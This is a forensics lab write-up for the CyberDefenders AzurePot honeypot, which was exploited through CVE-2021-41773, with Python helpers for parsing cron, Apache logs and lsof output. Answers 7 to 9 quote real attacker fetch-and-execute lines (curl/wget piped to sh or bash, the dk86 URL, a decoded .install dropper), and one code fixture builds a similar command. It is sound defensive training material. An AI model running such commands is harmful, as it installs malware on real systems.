AzurePot Lab

CyberDefenders Endpoint Forensics Lab

Scenario

This Ubuntu Linux honeypot was deployed in Azure in early October to monitor activity related to the exploitation of CVE-2021-41773.

Initially, the system attracted a significant number of cryptocurrency miners. To mitigate this, a cron script was implemented to remove files named "kinsing" in the /tmp directory, so that the miners would not interfere with the more interesting activity the honeypot was meant to observe.

There are three key files available:

- sdb.vhd.gz: a Virtual Hard Disk (VHD) image of the main drive, obtained through an Azure disk snapshot.
- ubuntu.20211208.mem.gz: a memory dump created with LiME (Linux Memory Extractor).
- uac.tgz: the output of UAC (Unix-like Artifacts Collector) run on the live system. This is not Windows User Account Control; it is the live-response collection tool, which is why the archive contains live_response/process and proc directories.

The artifacts were collected in the following order: the drive was snapshotted first, followed by the memory dump, and finally the UAC results were gathered. The order matters: anything that changed on disk after the snapshot is visible only in memory and in the UAC output, and the running-process view in UAC is slightly later than the one in the memory dump.

Question 1

There is a script that runs every minute to do cleanup. What is the name of the file?

Answer 1

Knowing the Linux file system is key here. After some research, there were a few places I wanted to try in order to find scheduled tasks (cron jobs):

/etc/crontab (the file; five schedule fields, then a user, then the command)
/etc/cron.d/ (drop-in files in the same format as /etc/crontab)
/etc/cron.hourly (plus cron.daily, cron.weekly and cron.monthly, executed by run-parts)
/var/spool/cron/ (per-user crontabs; on Ubuntu they live under /var/spool/cron/crontabs/, without a user field)

I found the answer, .remove.sh, in the listing of those locations (the screenshot is not reproduced here).
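The same search, written out as an added example (this is not code from the writeup or the lab): it walks the cron locations listed above relative to a mounted image root, parses both crontab formats, and flags the entries that fire every minute. The sample tree it builds is constructed for the example; the real job's location on the honeypot is not shown on this page, and the /root/.remove.sh path below is an assumption.

```python
import os
import tempfile

# Everything is resolved relative to ROOT, the mount point of the image
# (a read-only VHD mount, or a tree exported from FTK Imager).
SYSTEM_CRONTABS = ["etc/crontab"]             # five schedule fields + user + command
SYSTEM_CRON_DIRS = ["etc/cron.d"]             # same format as /etc/crontab
USER_CRON_DIRS = ["var/spool/cron/crontabs",  # Debian/Ubuntu per-user crontabs
                  "var/spool/cron"]           # RHEL-style per-user crontabs
PERIODIC_DIRS = ["etc/cron.hourly", "etc/cron.daily",
                 "etc/cron.weekly", "etc/cron.monthly"]  # executed by run-parts


def parse_crontab(path, system_format, default_user=None):
    """Return (file, schedule, user, command) for every job line in a crontab.

    system_format=True: /etc/crontab and /etc/cron.d files carry a user field
    between the schedule and the command; per-user spool files do not, so the
    owning user is the spool file name (default_user).
    """
    jobs = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for raw in fh:
            line = raw.strip()
            if not line or line.startswith("#"):
                continue
            tokens = line.split()
            if "=" in tokens[0]:                       # SHELL=, PATH=, MAILTO=
                continue
            n_sched = 1 if tokens[0].startswith("@") else 5   # @reboot, @hourly, ...
            n_skip = n_sched + (1 if system_format else 0)
            if len(tokens) <= n_skip:
                continue                                # malformed line; keep going
            schedule = " ".join(tokens[:n_sched])
            user = tokens[n_sched] if system_format else default_user
            command = " ".join(tokens[n_skip:])
            jobs.append((path, schedule, user, command))
    return jobs


def find_cron_jobs(root):
    """Enumerate every cron job reachable from a mounted root filesystem."""
    jobs = []
    for rel in SYSTEM_CRONTABS:
        p = os.path.join(root, rel)
        if os.path.isfile(p):
            jobs.extend(parse_crontab(p, system_format=True))
    for rel in SYSTEM_CRON_DIRS + USER_CRON_DIRS:
        d = os.path.join(root, rel)
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            p = os.path.join(d, name)
            if os.path.isfile(p):
                jobs.extend(parse_crontab(p, rel in SYSTEM_CRON_DIRS, default_user=name))
    for rel in PERIODIC_DIRS:
        d = os.path.join(root, rel)
        if os.path.isdir(d):
            for name in sorted(os.listdir(d)):
                # run-parts runs these on the cadence the directory name implies
                cadence = "run-parts:" + rel.split("cron.")[-1]
                jobs.append((os.path.join(d, name), cadence, "root", name))
    return jobs


def every_minute(jobs):
    """Jobs whose schedule fires every minute, the pattern Question 1 asks about."""
    return [j for j in jobs if j[1] == "* * * * *"]


def build_sample_root():
    """Constructed sample tree (not the lab image). Every path here is made up
    except the file name .remove.sh, which the walkthrough identifies."""
    root = tempfile.mkdtemp(prefix="azurepot_")
    os.makedirs(os.path.join(root, "etc/cron.d"))
    os.makedirs(os.path.join(root, "var/spool/cron/crontabs"))
    os.makedirs(os.path.join(root, "etc/cron.hourly"))
    with open(os.path.join(root, "etc/crontab"), "w") as fh:
        fh.write("SHELL=/bin/sh\n# m h dom mon dow user command\n"
                 "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n")
    with open(os.path.join(root, "etc/cron.d/cleanup"), "w") as fh:
        fh.write("* * * * * root /root/.remove.sh >/dev/null 2>&1\n")   # assumed location
    with open(os.path.join(root, "var/spool/cron/crontabs/www-data"), "w") as fh:
        fh.write("@reboot /tmp/agent\n")
    open(os.path.join(root, "etc/cron.hourly/logrotate"), "w").close()
    return root


if __name__ == "__main__":
    for job in find_cron_jobs(build_sample_root()):
        print(job)
```

On a real image, point find_cron_jobs at the mount point and review every row, not only the every-minute ones: a per-user @reboot entry in a spool file is just as interesting as the cleanup job.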

Question 2

The script in Q1 terminates processes associated with two Bitcoin miner malware files. What is the name of 1st malware file?

Answer 2

Following the path from question 1 to the script itself, .remove.sh contains the following:

#!/bin/bash

for PID in `ps -ef | egrep "kinsing|kdevtmp" | grep "/tmp"  | awk '{ print $2 }'`
do
 kill -9 $PID
done

chown root.root /tmp/k*
chmod 444 /tmp/k*

Question 3

The script changes the permissions for some files. What is their new permission?

Answer 3

The latter half of the script alters permissions with chmod: every file matching /tmp/k* is set to 444 (read-only for owner, group and others), immediately after chown root.root takes ownership away from whichever account dropped the miner, so it can no longer replace or re-execute its own files.

Question 4

What is the SHA256 of the botnet agent file?

Answer 4

I found this answer in a rather funny way. While looking through various folders to try and find a clue, Windows Defender on my VM started blocking threats when I tried to view them in FTK Imager. (Real-time protection on the analysis host can quarantine or alter evidence the moment it is extracted; exclude the evidence directory or work in an isolated VM, and hash files before opening them.)


The more methodical route is to start from the CVE in the scenario and check the Apache HTTP Server logs. CVE-2021-41773 is a path-traversal flaw in Apache httpd 2.4.49: a URL segment such as .%2e/ slips past path normalisation, and when mod_cgi is enabled the same trick reaches /bin/sh through /cgi-bin/ for remote command execution. With that in mind, the access log shows attempts to use the vulnerability for directory traversal.


Several of those requests returned HTTP 200, meaning the traversal succeeded, alongside some error codes. Knowing the payload had run, I searched error_log for signs of the malware and found not only another suspicious file fetched with wget, but the dk86 file itself. The hash the question wants is the SHA-256 of dk86 as recovered from the disk image (for example sha256sum on the extracted file), not of whatever the download URL serves today.

Question 5

What is the name of the botnet in Q4?

Answer 5

Question 6

What IP address matches the creation timestamp of the botnet agent file in Q4?

Answer 6

In the log file there are many commands attempting to grab the botnet agent file from the IP address shown below (the screenshot is not reproduced here).

Question 7

What URL did the attacker use to download the botnet agent?

Answer 7

As in the previous question, the log file reveals the following address:

http://138.197.206.223/wp-content/themes/twentysixteen/dk86

Question 8

What is the name of the file that the attacker downloaded to execute the malicious script and subsequently remove itself?

Answer 8

Since I was looking for something that deletes itself, the first thing to search for was the following command:

rm -rf

I couldn't find anything in the log with either argument that led anywhere. Next I looked for curl and wget commands to see what the attacker had downloaded to the system, and after a while stumbled across some base64, which was extremely suspicious.


Running most of it through CyberChef (base64 -d on the command line does the same), I found the file I was looking for:

 -o .install; chmod +x .install; sh .install > /dev/null 2>&1 & echo 'Done'; else echo 'Already install. Started';

The decoded tail shows the pattern: the download is written to .install, marked executable and run in the background with output discarded, and the else branch ('Already install. Started') means the one-liner first tests whether it has already been installed.

Question 9

The attacker downloaded SH scripts. What are the names of these files?

Answer 9

Filtering out the noise and looking only at curl/wget requests again, I was able to find the .sh scripts downloaded after the logs above: three requests in total. Each uses a curl-or-wget fallback, and the cgi:error line in between (curl: (23) Failed writing body) records the piped "| bash" variant, where bash had already closed its end of the pipe before curl could write the 14024-byte body.

[Sun Nov 28 07:23:40.903543 2021] [dumpio:trace7] [pid 2632:tid 139978789074688] mod_dumpio.c(103): [client 40.117.148.240:47940] mod_dumpio:  dumpio_in (data-HEAP): A=|echo;cd /dev/shm ; curl -s http://103.55.36.245/0_linux.sh -o 0_linux.sh || wget -q -O 0_linux.sh http://103.55.36.245/0_linux.sh; chmod 777 0_linux.sh; sh 0_linux.sh
[Sun Nov 28 10:29:56.398030 2021] [dumpio:trace7] [pid 2632:tid 139978529031936] mod_dumpio.c(103): [client 195.19.192.26:45304] mod_dumpio:  dumpio_in (data-HEAP): A=|echo;(curl -s 45.137.155.55/ap.sh||wget -q -O- 45.137.155.55/ap.sh)|bash
[Sun Nov 28 10:30:29.432016 2021] [cgi:error] [pid 2632:tid 139978529031936] [client 195.19.192.26:45304] AH01215: curl: (23) Failed writing body (0 != 14024): /bin/sh
[Sun Nov 28 16:21:20.401016 2021] [dumpio:trace7] [pid 2632:tid 139978503853824] mod_dumpio.c(103): [client 212.193.57.225:51570] mod_dumpio:  dumpio_in (data-HEAP): A=|echo;(curl -s 45.137.155.55/ap.sh||wget -q -O- 45.137.155.55/ap.sh)|bash
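The log triage from Questions 4, 7, 8 and 9 in one place, as an added example (not code from the writeup or the lab): it parses mod_dumpio request bodies, cgi:error lines and access-log requests, flags the CVE-2021-41773 traversal pattern, extracts every download URL and output file name, and decodes base64-wrapped stage-2 commands so they are mined too. The three error_log lines are copied from above; the access-log line and the base64 line are constructed for the example and use the 192.0.2.0/24 documentation range, not a real attacker address.

```python
import base64
import re

# Constructed stage-2 command, base64-wrapped the way the attacker's one-liner was.
_CONSTRUCTED_B64 = base64.b64encode(
    b"curl -s http://192.0.2.10/x -o .install; chmod +x .install; sh .install").decode()

# Copied from the walkthrough's error_log excerpt.
PAGE_ERROR_LOG = [
    "[Sun Nov 28 07:23:40.903543 2021] [dumpio:trace7] [pid 2632:tid 139978789074688] mod_dumpio.c(103): [client 40.117.148.240:47940] mod_dumpio:  dumpio_in (data-HEAP): A=|echo;cd /dev/shm ; curl -s http://103.55.36.245/0_linux.sh -o 0_linux.sh || wget -q -O 0_linux.sh http://103.55.36.245/0_linux.sh; chmod 777 0_linux.sh; sh 0_linux.sh",
    "[Sun Nov 28 10:29:56.398030 2021] [dumpio:trace7] [pid 2632:tid 139978529031936] mod_dumpio.c(103): [client 195.19.192.26:45304] mod_dumpio:  dumpio_in (data-HEAP): A=|echo;(curl -s 45.137.155.55/ap.sh||wget -q -O- 45.137.155.55/ap.sh)|bash",
    "[Sun Nov 28 10:30:29.432016 2021] [cgi:error] [pid 2632:tid 139978529031936] [client 195.19.192.26:45304] AH01215: curl: (23) Failed writing body (0 != 14024): /bin/sh",
]
# Constructed: one access-log hit for the traversal and one base64-wrapped command.
CONSTRUCTED_LINES = [
    '192.0.2.77 - - [28/Nov/2021:07:20:11 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 42 "-" "curl/7.79.1"',
    "[Sun Nov 28 07:21:02.000000 2021] [dumpio:trace7] [pid 2632:tid 139978789074688] mod_dumpio.c(103): [client 192.0.2.77:50000] mod_dumpio:  dumpio_in (data-HEAP): A=|echo;echo " + _CONSTRUCTED_B64 + "|base64 -d|bash",
]

DUMPIO_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[dumpio:trace7\] .*?\[client (?P<ip>[^\]:]+):(?P<port>\d+)\] "
    r"mod_dumpio:\s+dumpio_in \(data-HEAP\): (?P<body>.*)$")
CGI_ERR_RE = re.compile(r"\[cgi:error\] .*?\[client (?P<ip>[^\]:]+):\d+\] (?P<msg>.*)$")
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# CVE-2021-41773: a ".%2e" (dot, encoded dot) segment defeats httpd 2.4.49 path
# normalisation; %2e. and %2e%2e are the variants scanners also send.
TRAVERSAL_RE = re.compile(r"\.%2e|%2e\.|%2e%2e", re.IGNORECASE)
URL_RE = re.compile(r"(?:https?://)?(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?/[^\s;|)\"']+")
OUTFILE_RE = re.compile(r"\s-[oO]\s+([^\s;|&]+)")      # curl -o FILE / wget -O FILE (not -O-)
B64_RE = re.compile(r"echo\s+[\"']?([A-Za-z0-9+/]{16,}={0,2})[\"']?\s*\|\s*base64\s+(?:-d|--decode)")


def triage(lines):
    """Pull the indicators a responder wants from mixed access/error log lines."""
    out = {"traversal": [], "clients": set(), "urls": set(),
           "outfiles": set(), "decoded": [], "cgi_errors": []}
    for line in lines:
        m = ACCESS_RE.match(line)
        if m and TRAVERSAL_RE.search(m["path"]):
            out["traversal"].append((m["ip"], m["path"], int(m["status"])))
            continue
        m = CGI_ERR_RE.search(line)
        if m:
            out["clients"].add(m["ip"])
            out["cgi_errors"].append((m["ip"], m["msg"]))
            continue
        m = DUMPIO_RE.match(line)
        if not m:
            continue
        body = m["body"]
        out["clients"].add(m["ip"])
        # A stage-2 command may arrive base64-wrapped; decode it and mine it as well.
        for b64 in B64_RE.findall(body):
            decoded = base64.b64decode(b64).decode("utf-8", "replace")
            out["decoded"].append((m["ip"], decoded))
            body += " " + decoded
        out["urls"].update(URL_RE.findall(body))
        out["outfiles"].update(OUTFILE_RE.findall(body))
    return out


if __name__ == "__main__":
    for key, val in triage(PAGE_ERROR_LOG + CONSTRUCTED_LINES).items():
        print(key, val)
```

Run it over the full error_log and access.log rather than grepping for wget: the base64 branch is what turns the opaque blob from Question 8 into the -o .install command, and the urls set is the list of payload hosts to block or pivot on.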

Question 10

Two suspicious processes were running from a deleted directory. What are their PIDs?

Answer 10

For this I downloaded a new Windows tool to help me out, w64devkit, just to make searching files a little easier for myself, since I dislike using findstr.

Within the files provided I started to comb through the process folder and look into each text file. I didn't know this before, but lsof is a Unix tool whose name stands for "list open files". The -n, -P and -l in the capture's file name mean it was run without resolving hostnames, port names or user names, which is why the USER column below is a numeric UID. So I narrowed my search to lsof_-nPl.txt.

~/Downloads/uac/live_response/process $ grep 'deleted' lsof_-nPl.txt
none        609              0  txt       REG                0,1     8632      15254 / (deleted)
sleep      6388              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
sh        20645              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
sh        20645              1   10r      REG               8,17     9087     528810 /var/tmp/.log/101068/.spoollog/.src.sh (deleted)
agettyd   24330              1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330  7897        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24333        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24334        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24335        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24336        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24337        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)

Two processes have a current working directory (cwd) inside a deleted directory: PIDs 6388 and 20645 (second column). The agettyd rows for PID 24330 are a different pattern, an executable (txt) deleted from /tmp while it keeps running, and the extra third column on most of those rows is a thread ID, not a user.

Question 11

What is the suspicious command line associated with the PID that ends with `45` in Q10?

Answer 11

The third row down is the one: PID 20645, a sh process that still holds the deleted .src.sh open for reading on fd 10. The command line is sh src.sh (confirm the exact argv from the data UAC collected under proc/20645; lsof only shows open files, not arguments).

Question 12

UAC gathered some data from the second process in Q10. What is the remote IP address and remote port that was used in the attack?

Answer 12

Alongside lsof_-nPl.txt there is a folder called proc, which gives each process its own directory of additional information. Inside 20645 I found environ.txt, the process environment. Variables such as REMOTE_ADDR, REMOTE_PORT, QUERY_STRING and DOCUMENT_ROOT are the CGI environment Apache hands to a script, so this shell inherited them from the request that spawned it, and HTTP_USER_AGENT shows that request came from curl:

REMOTE_ADDR=116.202.187.77
QUERY_STRING=
OLDPWD=/var/tmp
HOME=/var/tmp/.log/101068/.spoollog/.api
HTTP_USER_AGENT=curl/7.79.1
DOCUMENT_ROOT=/usr/share/apache2/default-site/htdocs
REMOTE_PORT=56590

Question 13

Which user was responsible for executing the command in Q11?

Answer 13

Using the PID once again, I went searching inside ls_-la_proc.txt. ls -la on /proc lists each PID directory with its owner, and the owner of /proc/<pid> is the account the process runs as. The same answer can be cross-checked against the numeric USER column in lsof_-nPl.txt, resolved through the /etc/passwd from the disk image.

Question 14

Two suspicious shell processes were running from the tmp folder. What are their PIDs?

Answer 14

I used grep once again to hunt through lsof_-nPl.txt:

~/Downloads/uac/live_response/process $ grep '/tmp' lsof_-nPl.txt
sleep      6388              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
sh        15853              1  cwd       DIR               8,17    12288       4059 /tmp
sh        20645              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
sh        20645              1   10r      REG               8,17     9087     528810 /var/tmp/.log/101068/.spoollog/.src.sh (deleted)
sh        21785              1  cwd       DIR               8,17    12288       4059 /tmp
agettyd   24330              1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330  7897        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24333        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24334        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24335        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24336        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24337        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)

The first column shows what kind of process was running; here sh was what I was after, with a cwd of /tmp: PIDs 15853 and 21785. Note that grep '/tmp' also matches /var/tmp/... and /tmp/agettyd, so the filter that actually answers the question is command sh, FD cwd, NAME exactly /tmp.
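The checks behind Questions 10, 11 and 14, as an added example (not code from the writeup or the lab): a parser for lsof -nPl output that copes with the optional TID column, then three filters: deleted working directory, deleted executable, and shells whose cwd is exactly a given directory. The rows are the writeup's own lsof lines; the header and the benign bash row are constructed so the filters have something to ignore.

```python
from collections import namedtuple

# Header and the bash row are constructed; the rest are the walkthrough's lsof_-nPl.txt lines.
SAMPLE_LSOF = """\
COMMAND     PID    TID   USER   FD      TYPE             DEVICE SIZE/OFF       NODE NAME
bash       1000              0  cwd       DIR               8,17     4096          2 /
none        609              0  txt       REG                0,1     8632      15254 / (deleted)
sleep      6388              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
sh        15853              1  cwd       DIR               8,17    12288       4059 /tmp
sh        20645              1  cwd       DIR               8,17        0     528743 /var/tmp/.log/101068/.spoollog (deleted)
sh        20645              1   10r      REG               8,17     9087     528810 /var/tmp/.log/101068/.spoollog/.src.sh (deleted)
sh        21785              1  cwd       DIR               8,17    12288       4059 /tmp
agettyd   24330              1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330  7897        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
agettyd   24330 24333        1  txt       REG               8,17  7244192      30248 /tmp/agettyd (deleted)
"""

Entry = namedtuple("Entry", "command pid tid user fd ftype name deleted")
SHELLS = {"sh", "bash", "dash", "zsh"}
DELETED = " (deleted)"


def parse_lsof(text):
    """Parse `lsof -nPl` output. With -l the USER column is a numeric UID, and
    per-thread rows carry an extra TID column; the check on tokens[3] detects
    that, because an FD value is never bare digits (cwd, txt, 10r, ...).
    Newer lsof versions also print a TASKCMD column; adjust the offsets if so."""
    entries = []
    for line in text.splitlines():
        tokens = line.split()
        if not tokens or tokens[0] == "COMMAND":
            continue
        if tokens[3].isdigit():                       # COMMAND PID TID USER FD TYPE ...
            command, pid, tid, user, fd, ftype = tokens[:6]
            name = " ".join(tokens[9:])
        else:                                         # COMMAND PID USER FD TYPE ...
            command, pid, user, fd, ftype = tokens[:5]
            tid = None
            name = " ".join(tokens[8:])
        deleted = name.endswith(DELETED)
        if deleted:
            name = name[:-len(DELETED)]
        entries.append(Entry(command, int(pid), int(tid) if tid else None,
                             user, fd, ftype, name, deleted))
    return entries


def pids_with_deleted_cwd(entries):
    """Processes whose working directory was removed after they started (Question 10)."""
    return sorted({e.pid for e in entries if e.fd == "cwd" and e.deleted})


def pids_with_deleted_binary(entries):
    """Processes whose executable (txt) was unlinked, e.g. a dropper that deletes itself."""
    return sorted({e.pid for e in entries if e.fd == "txt" and e.deleted})


def shells_with_cwd(entries, directory):
    """Shells whose cwd is exactly `directory` (Question 14). A plain grep for
    '/tmp' also hits /var/tmp and file names under /tmp; matching on the cwd
    row and the exact path avoids that."""
    return sorted({e.pid for e in entries
                   if e.fd == "cwd" and e.command in SHELLS and e.name == directory})


def open_files_of(entries, pid):
    """Regular files a process holds open; recovers a deleted script's name (Question 11)."""
    return [(e.fd, e.name, e.deleted) for e in entries if e.pid == pid and e.ftype == "REG"]


if __name__ == "__main__":
    es = parse_lsof(SAMPLE_LSOF)
    print("deleted cwd:", pids_with_deleted_cwd(es))
    print("deleted binary:", pids_with_deleted_binary(es))
    print("shells in /tmp:", shells_with_cwd(es, "/tmp"))
    print("files of 20645:", open_files_of(es, 20645))
```

The "none" process 609 with a deleted "/" as its text segment shows up in the deleted-binary list as well; it is a different thing from the agettyd case and is worth a separate look rather than being filtered out silently.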

Question 15

What is the MAC address of the captured memory?

Answer 15

This question stumped me. Running volatility3 as usual had no effect on the .mem file. I read another guide that talked about setting up a new profile for volatility to use, which I had never had to do before. (In volatility3 terms this is a Linux symbol table in ISF JSON format, generated with dwarf2json from a debug kernel matching the exact build that was captured and placed in the volatility3 symbols directory; without it no Linux plugin can run against the dump.)

I went about it a different way. Making a symbol table would be a good exercise, but there was a simpler option: looking back in the UAC files, and knowing I needed a hardware address, the first place I checked was the network folder.

I found an ifconfig file that contained what I was looking for. Since UAC ran on the live system immediately after the memory dump was taken, its interface listing describes the same machine state the dump captured.

Question 16

Based on Bash history. The attacker downloaded the SH script. What is the name of the file?

Answer 16

Bash history is stored in /home/[USER]/.bash_history (and /root/.bash_history for root). From there I just searched for a .sh file, or equivalently a wget request, to find the following. One caveat: bash writes its history file when a session exits, so commands typed in a shell that was still open when the disk was snapshotted will not be in the file on the image.

Lab complete

I still need to learn how to make volatility profiles; it is on my to-do list. Finding the answers to the last two questions was much simpler this way, though. A challenging box, but fun.
